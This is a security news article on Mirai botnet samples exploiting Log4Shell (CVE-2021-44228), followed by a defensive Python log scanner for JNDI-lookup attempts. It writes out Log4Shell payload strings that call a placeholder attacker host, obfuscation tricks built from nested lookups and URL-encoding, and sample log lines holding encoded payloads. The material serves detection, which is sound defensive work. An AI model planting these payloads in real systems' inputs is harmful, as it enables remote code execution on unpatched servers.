Log4Shell, the critical unauthenticated remote code execution vulnerability identified in early December 2021 in the Apache Log4j logging utility, hasn’t seen the mass exploitation that many expected, but an exploit for it is now part of the Mirai botnet’s arsenal, researchers warn.
Both cybercriminals and nation-state threat actors have been observed exploiting the security bug – tracked as CVE-2021-44228 – in their attacks, including in attacks against industrial organizations.
Despite that, no mass exploitation of the vulnerability has been observed to date, most likely because the industry moved quickly to patch or mitigate Log4Shell and the further security issues identified in Log4j over the past two months.
With more threat actors adding exploits to their arsenals, exploitation of the Log4j vulnerabilities is expected to continue.
Recently, even malware spreading the Mirai botnet, well known for being used to launch massive distributed denial of service (DDoS) attacks, was observed packing code designed to exploit Log4Shell (CVE-2021-44228).
An examination of a recently captured ARM binary revealed the adaptation of CVE-2021-44228 to infect and assist in the proliferation of malware used by the Mirai botnet. This vulnerability impacts multiple versions of Log4j and the applications that depend on it. These include Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and many others. The exploit appears designed to specifically target devices from Zyxel, which has already confirmed impact from the vulnerability.
One of the observed samples was designed to scan for a range of devices vulnerable to remote code execution, while a second one dropped those scanning functions in favour of Log4j exploitation; the standard Mirai attack functions were still present in it.
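Exploitation of CVE-2021-44228, whether by a botnet or a human operator, works by getting a Log4j 2 consumer to log an attacker-controlled string that contains a JNDI lookup such as `${jndi:ldap://attacker-host/x}`, which the vulnerable library resolves and fetches. Scanners of the kind described above typically plant that string in HTTP headers or URL parameters, and they commonly wrap it in Log4j's own nested lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) or URL-encode it to slip past naive `jndi:` matching. The following Python snippet is an added example, not code from the original article or from the researchers' report: it shows how a defender can detect such attempts in web-server access logs by first undoing the encoding and the nesting tricks and only then looking for the JNDI lookup. The log lines, IP addresses (documentation ranges) and callback paths are constructed for the example, not indicators from the report, and the list of JNDI schemes is the set commonly seen in payloads rather than an exhaustive one. The detection is general to Log4Shell scanning, not specific to the Mirai samples.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one whose body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# JNDI lookup with one of the schemes commonly seen in Log4Shell payloads
# (assumption: this list is illustrative, not exhaustive).
_JNDI = re.compile(
    r"jndi:(ldap|ldaps|rmi|dns|iiop|corba|nis|nds|http)://([^\s\"'}]+)",
    re.IGNORECASE,
)


def _resolve_inner(body: str) -> str:
    """Emulate the Log4j 2 lookup evaluations attackers use to hide 'jndi'."""
    # "${::-j}" and "${env:NOPE:-j}" both evaluate to the default value "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if not sep:
        return ""  # e.g. "${user}": nothing useful for detection
    key = prefix.lower()
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    # Other lookups (env, sys, date, ...) cannot be resolved offline;
    # dropping them is safe here because the default-value form above is
    # the one used to smuggle payload characters.
    return ""


def _repl(m: "re.Match[str]") -> str:
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)  # keep the payload itself intact
    return _resolve_inner(body)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode (single or double encoding) and flatten nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        flattened = _INNER.sub(_repl, text)
        if flattened == text:
            break
        text = flattened
    return text


def find_jndi(line: str) -> Optional[str]:
    """Return the decoded JNDI lookup found in a log line, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan_logs(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded_payload) for every line carrying a lookup."""
    hits = []
    for line in lines:
        payload = find_jndi(line)
        if payload:
            hits.append((line.split(" ", 1)[0], payload))
    return hits


# Constructed access-log lines (combined log format); not real indicators.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:13:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:13:02:19 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.68"',
    '203.0.113.13 - - [10/Dec/2021:13:02:23 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D"',
    '203.0.113.14 - - [10/Dec/2021:13:02:30 +0000] "GET /docs/${user} HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, payload in scan_logs(SAMPLE_LOGS):
        print(f"{ip}\t{payload}")
```

The normalization step is what makes this more useful than a plain `grep -i jndi`: the second and third hits contain no literal `jndi` until the lookups are resolved and the percent-encoding removed. The callback host and port extracted from each hit are the natural pivot for blocking egress and for checking whether the server actually reached out to them.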
Indicators of Compromise